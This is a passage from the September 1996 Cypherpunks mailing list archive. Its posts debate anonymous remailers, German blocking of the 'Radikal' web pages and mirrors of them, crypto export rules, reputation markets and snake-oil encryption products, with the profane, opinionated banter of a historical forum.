into. I always use my true name and am happy to spread it far and wide, but I have been doing some work for a GroupWare manufacturer. They have seen that even in a corporate environment where information sharing is practised and embraced, sometimes people want to make a comment and not take the heat for making that comment. This can provide some constructive input, so they have an anonymous comment feature built in. So you could say that it is absolutely necessary for the web to have that feature as well. > of some third party in providing ultimate traceability. I'm not wild about > the U.S.
Government being this third party NO WAY, These guys are in my life enough already, and you can't trust them anyway!!!! Ross =========== Ross Wright King Media: Bulk Sales of Software Media and Duplication Services http://www.slip.net/~cdr/kingmedia Voice: 415-206-9906 From tcmay at got.net Thu Sep 5 01:07:33 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 5 Sep 1996 16:07:33 +0800 Subject: ZD Net Registration Message-ID: At 4:45 AM 9/5/96, Carl Ellison wrote: >http://community.zdnet.com/register/register.cgi > >Check this out! Harvesting Mother's Maiden Name. >I wonder how many they get each hour.... "Think of it as evolution in action." I tried to register as "foobar," but the name was taken. So I added a few bits. I used "fuckyou" as my mother's maiden name (no pun intended). So now I'm an full-fledged member of ZD Net, fuck you very much. The more things change... --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From nobody at replay.com Thu Sep 5 01:10:03 1996 From: nobody at replay.com (Anonymous) Date: Thu, 5 Sep 1996 16:10:03 +0800 Subject: WinSock Remailer Available Overseas Message-ID: <199609050553.HAA12430@basement.replay.com> The Winsock remailer announced by Joey Grasty available at Obscura, an access-controlled site on August 21, became available August 26 at at least five overseas sites, one of which is ftp://ftp.replay.com/pub/replay/pub/remailer/wsa12.zip OK, let's get some more non-USA remailers running!!
From jimbell at pacifier.com Thu Sep 5 01:14:41 1996 From: jimbell at pacifier.com (jim bell) Date: Thu, 5 Sep 1996 16:14:41 +0800 Subject: What is the EFF doing exactly? Message-ID: <199609050305.UAA08601@mail.pacifier.com> At 05:13 PM 9/4/96 -0700, Declan McCullagh wrote: >On Wed, 4 Sep 1996, jim bell wrote: >> Why WOULDN'T the police want to shut down anonymous remailers? The Leahy >> bill clearly didn't distinguish between remailer operators and users, so it >> is no leap to conclude that they would be treated similarly. > >Why *wouldn't* the police want to shut 'em down? Because the police >respect the Constitution and our civil liberties, of course, and realize >and respect the value of anonymous political speech. "Hey, man, whatever you'se been smoking, could'ja give me a joint or two?" Jim Bell jimbell at pacifier.com From declan at well.com Thu Sep 5 01:26:43 1996 From: declan at well.com (Declan McCullagh) Date: Thu, 5 Sep 1996 16:26:43 +0800 Subject: German prosecutors redouble attack on Net, subversive leftists Message-ID: [Note www.anonymizer.com doesn't seem to be blocked. --Declan] --- Date: Thu, 5 Sep 1996 01:59:36 +0200 (MET DST) From: Ulf Moeller To: fight-censorship at vorlon.mit.edu Subject: German Internet Censorhip: http://www.xs4all.nl The German Generalbundesanwaltschaft (Chief Federal Prosecutor's office) has "advised" the Internet providers to block access to http://www.xs4all.nl:80 and http://www.serve.com:80 due to supposedly illegal contents at the URLs http://www.serve.com/spg/154/, http://www.xs4all.nl/~tank/radikal//154/ and http://ourworld.compuserve.com/homepages/angela1/radilink.htm. The commercial ISPs have blocked the routes to the servers. Their statement (in German) is at http://www.anwalt.de/ictf/p960901d.htm "Radikal" (http://www.xs4all.nl/~tank/radikal) is a publication from the radical left that is illegal in Germany, but not in the Netherlands. 
--- Date: Wed, 4 Sep 1996 22:15:42 -0700 (PDT) From: Declan McCullagh To: fight-censorship at vorlon.mit.edu Subject: Re: German Internet Censorhip: http://www.xs4all.nl I heard about this a few days ago, but I was unable to verify it. Yesterday I bounced mail through a German university to xs4all.nl back to EFF, and it came through just fine. I also tried golden-gate.owl.de and wserver.physnet.uni-hamburg.de, both of which have no problems talking to xs4all.nl. From those tests, I can say there's no complete ban, though I can't confirm or deny any partial ban. However, just in case the German government is successful in this censorship gambit, I've mirrored the three embattled web sites at: http://www.well.com/~declan/mirrors/ This is a quick grab of the files in question; I'll work on a formatted intro page later. (As background for more recent subscribers to fight-censorship, this isn't the first time the German government has tried this. A similar move came early this year when German prosecutors tried to cut connections to webcom.com in California, where some of Ernst Zundel's Nazi "Holocaust Revisionist" propaganda was hosted. I and a few other folks including Rich at Stanford and Blake at Penn held our noses and mirrored it around the country, prompting the Gemans to lift the ban. I had thought the German prosecutors smarter than to try this again. I guess I was wrong.) My global Net-censorship roundup is at: http://www.eff.org/~declan/global/ -Declan From stewarts at ix.netcom.com Thu Sep 5 01:32:47 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 5 Sep 1996 16:32:47 +0800 Subject: rc2 export limits.. Message-ID: <199609050609.XAA17556@dfw-ix8.ix.netcom.com> I'm afraid my source is "Read it on the net and was surprised to hear it". My assumption is that the limit is for software that implements both signature and verification, since ITAR doesn't ban export of pure-authentication software. Is the State Dept doc on the net? 
It would be nice to have something saying there are well-defined rules that they agree to follow, unreasonable and unconstitutional though they may be. At 12:06 PM 9/4/96 -0400, Kent Briggs <72124.3234 at compuserve.com> wrote: >stewarts at ix.netcom.com wrote: >> However, the usual guidelines for systems like RC2 and RC4 is >> 40-bit keys, and RSA keys up to 512 bits for encrypting >> session keys and 1024 bits for signatures > >Can you list a source for the 1024-bit signature restriction? I know >about the 40-bit RC2/RC4 and 512-bit public encryption keys because they >are specifically addressed in the State Dept's "Procedure for Submitting >a Commodity Jurisdiction Request for a Mass Market Software Product that >Contains Encryption". However, digital signatures are not mentioned in >this procedure. I can't image what justificication could be used to >restrict the strength of digital signatures. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From mccoy at communities.com Thu Sep 5 01:40:38 1996 From: mccoy at communities.com (Jim McCoy) Date: Thu, 5 Sep 1996 16:40:38 +0800 Subject: Reputations Message-ID: Greg Burk writes: > Too little incentive to shoot for the heights: > > Suppose you judge that you've accumulated twice as much "reputation > capital" as Joe. How do you get twice as much payoff? It seems to me > that above the threshhold of credibility, minor side issues make more > difference than your two-fold "reputation capital" differential. Go read Ender's Game by Orson Scott Card (a good book to read anyway :) and examine the nature of the computer network "discussion groups" he talks about: a classic example of reputation markets in many-to-many discussions. With the proper tools someone with twice the reputation capital in a particular category as another will have a greater chance of what they say not being filtered out as noise. 
> As an "asset", it is extremely non-liquid: > > How exactly would you "convert" your reputation into other capital? > Would you accept bribes and tell lies? Seems to me you would only get a > one-shot "conversion" and it couldn't possibly hope to equal your > investment. Tell that to Walter Cronkite, Siskel & Ebert, Moody's and others who have converted reputation capital into large piles of money. Time is an asset that has a monetary value to most people, and they are willing to spend money to hear the opinions of sources which they feel have a high reputation in a particular area rather than spending the time necessary to do the research and investigation themselves. > So I think the latter part of the analysis is wishful thinking, or at > least restricted to a small subset of subject-matter. No, I think that you just don't understand the mechanics of reputations and how they interact with the most important resource in most people's lives: time. Instead of thinking of "reputation" look at it from the other end and consider the "attention marketplace." Right now reputation markets have a limited presence on the internet (mostly through killfiles) because the tools required are not integreated into the tools used to browse the information. In time this will change. jim From Adamsc at io-online.com Thu Sep 5 01:44:28 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 5 Sep 1996 16:44:28 +0800 Subject: Internet blamed in shoe-cam crimes, assailant free on $750 bail Message-ID: <19960905062418656.AAA164@IO-ONLINE.COM> On Wed, 4 Sep 1996 23:31:29 -0400 (EDT), The Deviant wrote: >> He said the man was detected by two couples who noticed him moving his >> foot under the skirt of a woman. They followed the man, held him and >> called police. >> Police ask women who feel they've been victimized to call 808-5289. >> George Walter Campbell, 62, of Cornwall, has been charged with sexual >> assault and mischief. He returns to College Park court on Sept. 10. 
>> He was released on $750 cash bail yesterday. >Hrmm.. I can see how its _wrong_, but exactly how is looking under >somebodies skirt _assault_? Mischief is true. However it does get back to the eventual question: if they are giving off radiation, are we guilty receiving them? For instance, if you have your pot sensing IR camera in a plane, do you need a search warrant? If you walk around with a scanner listening to cell-phones is it illegal? One can also imagine a sewer worker getting sued for looking out of one of those cover grill things. (Perhaps up at a cover girl. Pun intended.) - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From nobody at zifi.genetics.utah.edu Thu Sep 5 01:56:13 1996 From: nobody at zifi.genetics.utah.edu (Anonymous) Date: Thu, 5 Sep 1996 16:56:13 +0800 Subject: Race Bit: C Message-ID: <199609050630.AAA07395@zifi.genetics.utah.edu> >At 02:47 AM 9/4/96 -0700, Timothy C. May wrote: >>At 3:02 AM 9/4/96, James A. Donald wrote: >>>At 10:33 PM 9/3/96 -0800, jim bell wrote: <...> [I am unsure just *who* wrote:] >>As the recent discussion of knives, switchblades, and throwing stars >>showed, such ambiguous laws are often used to keep the coloreds down. Gunlaws and druglaws have deep roots in racism, but it is politically incorrect to say, even if I can find it in the congressional record. [and I can.] 
But then it was certainly Jim Bell who wrote: >Perhaps the most ominous part of making "use of encryption to thwart an >investigation" illegal is _not_ that remailer operators might be prosecuted, >but that they might NOT be prosecuted in a deal where (in exchange for not >being prosecuted) they continue to operate the remailer, "cracked" or >sabotaged so that they share all the info with the cops. While even that >won't make chained remailers totally useless, eventually suspicions of such >a crack will surface, which will help sabotage the credibility of all >remailers, not just the ones that have been "stung." If someone tried a scheme involving violence such as A. P. through a remailer I was involved in, the feds would not have to threaten me with prosecution to get me to cooperate with them. I may not keep any logs right now, Jim, but if your little scheme gets underway I will cooperate willingly as long as I don't compromise the privacy of non- violent people such as drug users & sellers. For them, I would go to jail; for you, I would even cooperate with the BATF (which should be defunded 100%, IMO). Violence begats violence which begats even larger government, don't start us on that road -- leave me in peace. From isptv at access.digex.net Thu Sep 5 02:17:49 1996 From: isptv at access.digex.net (ISP-TV Main Contact) Date: Thu, 5 Sep 1996 17:17:49 +0800 Subject: No Subject Message-ID: <199609050626.CAA28796@access2.digex.net> *** ISP-TV Program Announcement: Meeks Interview *** Monday, September 9 9:00 PM ET Brock Meeks Chief Washington Correspondent for WIRED and HotWIRED WIRED's chief muckraking journalist will join ISP-TV for a discussion of the the technology policy underbelly of Washington, D.C, ranging from the Communications Decency Act to pornography in the bathrooms of the Senate Russell Building. 
This video interview can be viewed on the ISP-TV main CU-SeeMe reflector at IP 205.197.247.33, or other ISP-TV affiliate reflectors listed at http://www.digex.net/isptv/members.html There will be a call-in number for questions, and we will be monitoring EFnet IRC channel #isptv See URL http://www.digex.net/isptv for more information about the ISP-TV Network From jamesd at echeque.com Thu Sep 5 02:21:19 1996 From: jamesd at echeque.com (James A. Donald) Date: Thu, 5 Sep 1996 17:21:19 +0800 Subject: FWD: Another try to kill democracy Message-ID: <199609050642.XAA28858@dns2.noc.best.net> At 09:53 PM 9/2/96 +0000, SPG wrote: > I just got wind that the German government is planning to force german > ISP's to shut off access to my ISP, XS4ALL, because the german magazine >'Radikal' has a web page on xs4all. A few more details please: What german agency is taking what action. Has any access been shut off yet, or is it just some two bit asshole fascist with delusions of grandeur? > Please considder mirroring or linking to this site. Linking is pointless if the site is cut off or access seriously threatened. Mirroring is appropriate only if access is seriously threatened. How serious is this threat? --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From tcmay at got.net Thu Sep 5 03:01:37 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 5 Sep 1996 18:01:37 +0800 Subject: Reasons for Preferring Anonymity Message-ID: At 3:41 AM 9/4/96, Jon Lebkowsky wrote: >The terms "responsibility" and "accountability" are misused, which is >unfortunate, since I think we'd all argue in favor of taking responsibility >for our speech/actions in a positive sense. 
The negative is in asking me to This issue keeps coming up: "Shouldn't people be willing to take responsibility for their speech and actions?" No, actually, and I presented the fact that people are using anonymity and remailers as evidence that clearly they are not willing to take responsibility under their own, traceable True Names for their speech. Q.E.D. But the issue persist. Well, why do people use anonymity in general? * To call the IRS to ask questions. Maybe to ask what they should do if they haven't paid taxes since 1983. Believe me, with the advent of "Caller ID" here in California, I've learned to use payphones before calling the IRS office over in San Jose. (As the Net takes on a larger role, what will be the parallel to anonymous calls to the IRS? Obvious answer.) * AIDS test results. And a whole panoply of similar queries. Caller anonymity is crucial. * Whistleblowing, obviously. * Ordering of information and supplies is often done through agents, or cut-outs. Coca Cola, as the story goes, orders supplies so as to deliberately confuse those trying to deduce the formula for Coke (probably a bad example, as the 80-90 years of Coke has probably made the formula for Coke a kind of joke). But there are very real cases where businesses make queries or orders and cannot tolerate traceability to them. (Dyson's thought that maybe anonymity should be banned for businesses shows her lack of understanding of the issues.) * As a special form of whistleblowing, sometimes people have information they feel should be disseminated, and have no desire to be "accountable" for releasing this information. The release of RC4 code is an example. The Dumpster diving of Mykotronx is another. * Admissions and confessions. Those who use the various "recovery" groups obviously feel no need to ensure "accountability" and "traceability," nor should they. * Their comments may affect their Real World jobs, their status in organizations, their distant future political careers, etc. 
(In an age of Web spiders, anything said may show up in future lawsuits, divorce settlements, tenure reviews, political campaigns, etc.) And so on. John L. may wish that all people believe in being held accountable for their speech and actions, but obviously this demonstrably is not the case. Names are just another credential, another potential factor in a transaction. Sometimes they help to close a deal, sometimes they are unneeded. The notion that a government-issued name credential is necessary for mutually-satisfactory transactions is just an illusion. --Tim May (have any of you checked that I am really, truly who I claim to be? Have you been dealing with me on the basis of belief that I am a persistent persona, or because you saw me present an SS card?) We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From madden+ at andrew.cmu.edu Thu Sep 5 04:32:51 1996 From: madden+ at andrew.cmu.edu (Rebecca L Madden) Date: Thu, 5 Sep 1996 19:32:51 +0800 Subject: up In-Reply-To: Message-ID: it's three o four. I'm up. Becky Madden #(412)-862-2934 //<@>\\*//<@>\\*//<@>\\*//<@>\\*//<@>\\*//<@>\\ I believe that imagination is stronger than knowledge- That myth is more potent than history. I believe that dreams are more powerful than facts- That hope always triumphs over experience- That laughter is the only cure for grief. And I believe that love is stronger than death. 
-Robert Fulghum From gary at systemics.com Thu Sep 5 05:02:45 1996 From: gary at systemics.com (Gary Howland) Date: Thu, 5 Sep 1996 20:02:45 +0800 Subject: German prosecutors redouble attack on Net, subversive leftists In-Reply-To: Message-ID: <322E94B9.41C67EA6@systemics.com> Declan McCullagh wrote: > > The German Generalbundesanwaltschaft (Chief Federal Prosecutor's > office) has "advised" the Internet providers to block access to > http://www.xs4all.nl:80 and http://www.serve.com:80 due to > supposedly illegal contents at the URLs http://www.serve.com/spg/154/, > http://www.xs4all.nl/~tank/radikal//154/ and > http://ourworld.compuserve.com/homepages/angela1/radilink.htm. > > The commercial ISPs have blocked the routes to the servers. > Their statement (in German) is at http://www.anwalt.de/ictf/p960901d.htm I wonder how they are doing this? We know that the Germans allow full internet access (don't they?), so they can't be using a filtering http proxy. I guess they're blocking on IP number (and perhaps port). It might be a good idea for xs4all to gather up all of their spare IP numbers, and alias the lot on their web site - this would increase the number of blocked addresses needed. It might also be a good idea to run some proxies on unusual ports (eg. smtp, DNS, pop, ftp ports) (although of course this will then need to be a dedicated proxy machine) - again this would increase the size of the blacklist that the Germans must use, and may involve some awkward router programming (for example, a router might be configured to allow all DNS traffic - if a proxy is sitting on the DNS port, then things get a bit difficult to set up). Of course, netscape probably won't allow use of these ports (it certainly doesn't allow the use of port 79). Gary -- pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From moe-san at stadt.com Thu Sep 5 06:44:31 1996 From: moe-san at stadt.com (D. 
Moeller) Date: Thu, 5 Sep 1996 21:44:31 +0800 Subject: FWD: Another try to kill democracy In-Reply-To: <199609050642.XAA28858@dns2.noc.best.net> Message-ID: <322EA63D.35B5@stadt.com> James A. Donald wrote: > > At 09:53 PM 9/2/96 +0000, SPG wrote: > > I just got wind that the German government is planning to force german > > ISP's to shut off access to my ISP, XS4ALL, because the german magazine > >'Radikal' has a web page on xs4all. <..> > How serious is this threat? No problem in gaining access so far. I even traced through Telekom and C-Serve - no trace of restrictions. Maybe just a way to generate traffic to a lame site? Cheers Moe! -- D. Moeller at WebLab U-Agency GmbH webadmin at stadt.com http://www.stadt.com/u-agency/ moe-san at elcafe.com http://www.elcafe.com/~moe-san/ From tank at xs4all.nl Thu Sep 5 07:38:38 1996 From: tank at xs4all.nl (SPG) Date: Thu, 5 Sep 1996 22:38:38 +0800 Subject: FWD: Another try to kill democracy Message-ID: <322ECF33.6871CB6D@xs4all.nl> James A. Donald wrote: > > A few more details please: What german agency is taking what action. Oke, taken from: http://www.anwalt.de/ictf/p960901e.htm ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Internet Content Task Force (ICTF), Press Release of Sep. 03, 1996 RA Michael Schneider, eco e.V. A telefax was received by us from the Public Prosecutor General on August 30 in which eco e.V. is informed of an on-going investigatory procedure. We have been requested in this context to inform all Internet service providers affiliated with ICTF (Internet Content Task Force) the following in writing: "Under the following addresses in Internet: http://www.serve.com/spg/154/ http://www.xs4all.nl/~tank/radikal//154/ and using the link on page http://ourworld.compuserve.com/homepages/angela1/radilink.htm one can call up the entire edition of the pamphlet entitled "radikal Nr. 154". 
Parts of this pamphlet justify preliminary suspicion of promoting a terrorist organization under § 129a, Par.3 of the German Criminal Code, public condoning of criminal activities penalizable under § 140 no.2 of the German Criminal Code and preliminary suspicion of inciting to criminal activity under § 130a Par.1 of the German Criminal Code. The Public Prosecutor General at the Federal Court of Justice has therefore initiated a criminal investigatory procedure against the parties disseminating this pamphlet. You are herewith informed that you may possibly make yourself subject to criminal prosecution for aiding and abetting criminal activities if you continue to allow these pages to be called up via your access points and network crosspoints" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ > > Please consider mirroring or linking to this site. As of today: http://burn.ucsd.edu/%7Eats/RADIKAL/ http://www.jca.or.jp/~taratta/mirror/radikal/ http://www.serve.com/~spg/ http://huizen.dds.nl/~radikal http://www.canucksoup.net/radikal/index.html http://www.ecn.org/radikal http://www.well.com/~declan/mirrors/ http://www.connix.com/~harry/radikal/index.htm http://www.connix.com/~harry > Linking is pointless if the site is cut off or access seriously threatened. > > Mirroring is appropriate only if access is seriously threatened. > > How serious is this threat? Serious enough I think. henk (SPG) From asgaard at Cor.sos.sll.se Thu Sep 5 08:25:02 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Thu, 5 Sep 1996 23:25:02 +0800 Subject: ... subversive leftists In-Reply-To: Message-ID: On Wed, 4 Sep 1996, Declan McCullagh wrote: > The German Generalbundesanwaltschaft (Chief Federal Prosecutor's > office) has "advised" the Internet providers to block access to > "Radikal" (http://www.xs4all.nl/~tank/radikal) is a publication > from the radical left that is illegal in Germany, but not in > the Netherlands. This is amazing. 
Without defending the German stand on the Revisionist crap, that part is at least understandable in a historical context (their sense of guilt for the unfortunate developments in the 30's and 40's etc). But a quick overview of the contents of Radikal gives the impression of an ordinary leftist zine, defining the outlawing of it as pure political censorship in a Western 'democracy'. I'm truly surprised. Asgaard From peter.allan at aeat.co.uk Thu Sep 5 09:31:37 1996 From: peter.allan at aeat.co.uk (Peter M Allan) Date: Fri, 6 Sep 1996 00:31:37 +0800 Subject: Job for netescrow ? (was Secure anonymouse server protocol... Message-ID: <9609051155.AA14504@clare.risley.aeat.co.uk> In the talk about replyable nym-mailers I haven't yet seen netescrow mentioned. You DID all read this ? > Oblivious Key Escrow > Matt Blaze AT&T Research > mab at research.att.com > 12 June 1996 > > Abstract > We propose a simple scheme, based on secret-sharing over large-scale > networks, for assuring recoverability of sensitive archived data e.g., > cryptographic keys. In our model any one can request a copy of the > archived data but it is very difficult to keep the existence of a > request secret or to subvert the access policy of the data owner. This all hinges on a policy to be followed by archive holders defining the conditions under which they release their shares. This could be receipt of a signed request from the owner (remailer). Maybe the table relating nyms to reply addresses could be stored in netescrow style so that captured remailers reveal nothing. The problem of operator coercion is not addressed by this. Police investigations might apply "angry mob cryptanalysis" to find a sender - convincing a sizable number of operators that a crime had been committed with some particular piece of traffic. Anybody want to estimate traffic + storage requirements ? Or number of participants needed for a viable scheme ? 
-- Peter Allan peter.allan at aeat.co.uk From richards at netrex.com Thu Sep 5 10:26:36 1996 From: richards at netrex.com (Richard Stiennon) Date: Fri, 6 Sep 1996 01:26:36 +0800 Subject: 2^1,257,787-1 Message-ID: <2.2.32.19960905122436.00b04674@trex.netrex.com> At 09:54 AM 9/4/96 -0700, John F. Fricker wrote: >Ok so maybe here in Organ we are a little behind the times but I just heard >about this 378,632 digit prime. Grab your HP11C's and crank out >2^1,257,787-1 courtesy of David Slowinski at Cray. Is there a URL for the entire number? Or could someone post it to the list? ---------------------------------------------------------------------------- Richard Stiennon richards at netrex.com Director, Business Development http://www.netrex.com Netrex, Inc. Voice: 810-352-9643 Southfield, Michigan Fax: 810-352-2375 ----------------------------------------------------------------------------- Providing businesses and organizations with secure Internet solutions. From ponder at freenet.tlh.fl.us Thu Sep 5 11:11:32 1996 From: ponder at freenet.tlh.fl.us (P. J. Ponder) Date: Fri, 6 Sep 1996 02:11:32 +0800 Subject: rc2 export limits.. Message-ID: keywords: ITAR, SHA, beneficial and innocuous crypto The persistent reputation known as Bill Stewart wrote: >Date: Wed, 04 Sep 1996 23:09:17 -0700 >From: Bill Stewart >To: Kent Briggs <72124.3234 at compuserve.com> >Cc: cypherpunks at toad.com >Subject: Re: rc2 export limits.. > >I'm afraid my source is "Read it on the net and was surprised to hear it". >My assumption is that the limit is for software that implements >both signature and verification, since ITAR doesn't ban export of >pure-authentication software. The FIPS Pub (?180? ?181?) for the Secure Hash Algorithm (SHA) states in the fine print at the beginning that SHA is export controlled. I don't have the document to refer to right now, but it plainly states that SHA falls under ITAR. As a cryptographic hash function, why would it be controlled in this way? 
How can I use SHA to encrypt something for someone else to decrypt? I know how to use it for authentication; am I missing something here? ANFSCD: I tried that OnNet32 e-mail software from FTP software. It runs under Windows95. It is a lot of material to download, and way too intrusive to install. It wants to metastasize itself into the innards of Microsoft Exchange and Inboxes, etc. What is it with all this complexity anyway? Why not just have a POP client that will check mail on the server? It also wants you to store your mailbox password in it, as opposed to letting you enter it on a session-by-session basis. I don't like that. sticking with PINE, PGP, and Xywrite II for now.... From bkmarsh at feist.com Thu Sep 5 11:18:30 1996 From: bkmarsh at feist.com (Bruce M.) Date: Fri, 6 Sep 1996 02:18:30 +0800 Subject: Internet blamed in shoe-cam crimes, assailant free on $750 bail In-Reply-To: Message-ID: On Wed, 4 Sep 1996, Declan McCullagh wrote: > > Hrmm.. I can see how its _wrong_, but exactly how is looking under > > somebodies skirt _assault_? > > Why is this wrong? Information wants to be free! > > More to the point, boys used to put mirrors on their shoes. Now they > learn about shoecams on the Net. I'm working on some nanotech bots to take care of everything now. With a little more work I'm sure they'll be able to actually later reproduce the 'target' in life-like synthetics. Uhh.. any investors interested? :) ________________________________ [ Bruce M. - Feist Systems, Inc. ] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ "Official estimates show that more than 120 countries have or are developing [information warfare] capabilities." -GAO/AIMD-96-84 So, what is your excuse now? 
From campbell at c2.net Thu Sep 5 11:21:04 1996 From: campbell at c2.net (Rick Campbell) Date: Fri, 6 Sep 1996 02:21:04 +0800 Subject: NYT on penet closure Message-ID: <9609051348.AA16186@cfdevx1.lehman.com> http://www.nytimes.com/library/cyber/week/0905remail.html September 5, 1996 Scientology Case and Finnish Law Blamed for Demise of Remail Service By PAMELA MENDELS The issue, Johan M. Helsingius insists, was not pornography but privacy. Helsingius, the Finnish volunteer who shook the online community last week with the announcement that he was closing his popular anonymous remailer service, said in an interview on Wednesday that he had acted because he believes that Finland today offers inadequate privacy protection to Internet users. The only thing I am concerned with is that the threshold of protection for the Internet should be the same as for ordinary postal mail or phone calls. Johan M. Helsingius [ I've deleted the rest of the article. See the URL above for the full text. -Rick ] From paul at fatmans.demon.co.uk Thu Sep 5 12:26:00 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Fri, 6 Sep 1996 03:26:00 +0800 Subject: SNAKEOIL ALLERT: FUCKHEAD ;-) Message-ID: <841932737.22584.0@fatmans.demon.co.uk> > SK> I am currently not releasing the source code.Here is a copy of the zip > SK> file if you get hold of a pc. Aghhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh. Last week it was " The Knapsack TM " with a "proprietary algorithm" now it`s Secureit for windows! It`s a veritable flood of snakeoil..... 
let's start a drumroll: fuckhead Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" From paul at fatmans.demon.co.uk Thu Sep 5 12:35:47 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Fri, 6 Sep 1996 03:35:47 +0800 Subject: Pseudocrypto detector is going wild Message-ID: <841932730.22539.0@fatmans.demon.co.uk> > Is it just me, or is the snake-oil frequency factor scaling up? > We used to get this stuff quarterly, and now it's monthly, if > not weekly! > > slither-squeek Yeah, I too have noticed this. Hey kids, here's Uncle Paul's Snake oil test. if the post contains any of the following it is slither-squeek material: 1. The word "Proprietary" 2. References to a new algorithm, which hasn`t been seen yet and is "the strongest ever" 3. people who use TM after their algorithm, this is Snakeoil(TM)(R) 4. People who think cryptographers seeing their algorithm will make it less secure 5. People who have never coded a crypto tool in their life then instead of working on current algorithm implementations re-invent the wheel because they don`t understand how to implement current ciphers. 
Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" From paul at fatmans.demon.co.uk Thu Sep 5 12:53:32 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Fri, 6 Sep 1996 03:53:32 +0800 Subject: No Subject Message-ID: <841932742.22613.0@fatmans.demon.co.uk> > > The gubment has no right to fuck with any speech - (seditius) libel, child > > porn, bomb-making instructions... > > > Agreed. Otherwise, by a slippery slope argument, they can eventually > suppress any form of speech whatsoever. true enough, most punks on here are a bit less radical but we need more of this sort of absolutism Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" From schmidt at pin.de Thu Sep 5 14:15:22 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Fri, 6 Sep 1996 05:15:22 +0800 Subject: German prosecutors redouble attack on Net, subversive leftists In-Reply-To: Message-ID: On Thu, 5 Sep 1996, Declan McCullagh wrote: > > You're not talking about http://www.anwalt.de/ictf/p960901e.htm, are you? > I'm talking about this link (you mentioned earlier). 
Maybe I can translate it (or I can summarize it). (tomorrow :) -stephan From tcmay at got.net Thu Sep 5 15:11:46 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 6 Sep 1996 06:11:46 +0800 Subject: Herr Schmidt Message-ID: At 3:20 PM 9/5/96, Stephan Schmidt wrote: >Definetly not. >There is an advisory from the Generalbundesanwaltschaft and >the ICTF that ISPs should ('have to') restrict the access to >those urls. > >But so far nothing happend. I asked some people >to try the urls and there where no restrictions. >(I encounterd no restrictions myself.) By the way, I used the name "Schmidt" in my satire post, sent out earlier this morning. I picked that name randomly, being a common German name (cognate to Smith, I believe), and meant nothing with regard to Stephan. (I also don't dislike Germans in general. I studied some German in high school--don't ask me to use it, though!--and have visited Germany. They just have a certain well-known tendency to take the authoritarian path at times.) --Tim We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From makof at alias.cyberpass.net Thu Sep 5 15:16:45 1996 From: makof at alias.cyberpass.net (makofi) Date: Fri, 6 Sep 1996 06:16:45 +0800 Subject: Steganography -- Tell-tale signs? Message-ID: <199609051649.JAA06578@sirius.infonex.com> Hi there! I'd appreciate some help from you experts in steganography. 1) If I hide some PGP encrypted data in a gif, jpg or wav file will there be any tell tale signs to the naked eye of an expert? If yes, what are they? 
